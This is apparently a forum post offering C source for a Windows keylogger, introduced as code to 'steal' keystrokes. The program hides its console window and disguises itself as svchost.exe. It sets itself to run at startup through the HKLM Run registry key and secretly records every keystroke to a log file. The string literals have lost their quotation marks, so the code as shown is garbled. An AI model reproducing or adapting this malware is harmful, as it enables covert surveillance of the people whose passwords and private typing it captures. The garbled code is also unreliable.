Enjoy with this steal key logger code that I wrote. #include <windows.h> #include <stdio.h> #include <winuser.h> #include <windowsx.h> #define BUFSIZE 80 int test_key(void); int create_key(char *); int get_keys(void); int main(void) { HWND stealth; /*creating stealth (window is not visible)*/ AllocConsole(); stealth=FindWindowA(ConsoleWindowClass,NULL); ShowWindow(stealth,0); int test,create; test=test_key();/*check if key is available for opening*/ if (test==2)/*create key*/ { char *path=c:\\%windir%\\svchost.exe;/*the path in which the file needs to be*/ create=create_key(path); } int t=get_keys(); return t; } int get_keys(void) { short character; while(1) { sleep(10);/*to prevent 100% cpu usage*/ for(character=8;character<=222;character++) { if(GetAsyncKeyState(character)==-32767) { FILE *file; file=fopen(svchost.log,a+); if(file==NULL) { return 1; } if(file!=NULL) { if((character>=39)&&(character<=64)) { fputc(character,file); fclose(file); break; } else if((character>64)&&(character<91)) { character+=32; fputc(character,file); fclose(file); break; } else { switch(character) { case VK_SPACE: fputc( ,file); fclose(file); break; case VK_SHIFT: fputs([SHIFT],file); fclose(file); break; case VK_RETURN: fputs(\n[ENTER],file); fclose(file); break; case VK_BACK: fputs([BACKSPACE],file); fclose(file); break; case VK_TAB: fputs([TAB],file); fclose(file); break; case VK_CONTROL: fputs([CTRL],file); fclose(file); break; case VK_DELETE: fputs([DEL],file); fclose(file); break; case VK_OEM_1: fputs([;:],file); fclose(file); break; case VK_OEM_2: fputs([/?],file); fclose(file); break; case VK_OEM_3: fputs([`~],file); fclose(file); break; case VK_OEM_4: fputs([ [{ ],file); fclose(file); break; case VK_OEM_5: fputs([\\|],file); fclose(file); break; case VK_OEM_6: fputs([ ]} ],file); fclose(file); break; case VK_OEM_7: fputs([\],file); fclose(file); break; /*case VK_OEM_PLUS: fputc(+,file); fclose(file); break; case VK_OEM_COMMA: fputc(,,file); fclose(file); break; case VK_OEM_MINUS: fputc(-,file); fclose(file); break; case VK_OEM_PERIOD: fputc(.,file); fclose(file); break;*/ case VK_NUMPAD0: fputc(0,file); fclose(file); break; case VK_NUMPAD1: fputc(1,file); fclose(file); break; case VK_NUMPAD2: fputc(2,file); fclose(file); break; case VK_NUMPAD3: fputc(3,file); fclose(file); break; case VK_NUMPAD4: fputc(4,file); fclose(file); break; case VK_NUMPAD5: fputc(5,file); fclose(file); break; case VK_NUMPAD6: fputc(6,file); fclose(file); break; case VK_NUMPAD7: fputc(7,file); fclose(file); break; case VK_NUMPAD8: fputc(8,file); fclose(file); break; case VK_NUMPAD9: fputc(9,file); fclose(file); break; case VK_CAPITAL: fputs([CAPS LOCK],file); fclose(file); break; default: fclose(file); break; } } } } } } return EXIT_SUCCESS; } int test_key(void) { int check; HKEY hKey; char path[BUFSIZE]; DWORD buf_length=BUFSIZE; int reg_key; reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run,0,KEY_QUERY_VALUE,&hKey); if(reg_key!=0) { check=1; return check; } reg_key=RegQueryValueEx(hKey,svchost,NULL,NULL,(LPBYTE)path,&buf_length); if((reg_key!=0)||(buf_length>BUFSIZE)) check=2; if(reg_key==0) check=0; RegCloseKey(hKey); return check; } int create_key(char *path) { int reg_key,check; HKEY hkey; reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run,&hkey); if(reg_key==0) { RegSetValueEx((HKEY)hkey,svchost,0,REG_SZ,(BYTE *)path,strlen(path)); check=0; return check; } if(reg_key!=0) check=1; return check; }
Posted on: Wed, 13 Aug 2014 10:11:34 +0000
Recently Viewed Topics
© 2015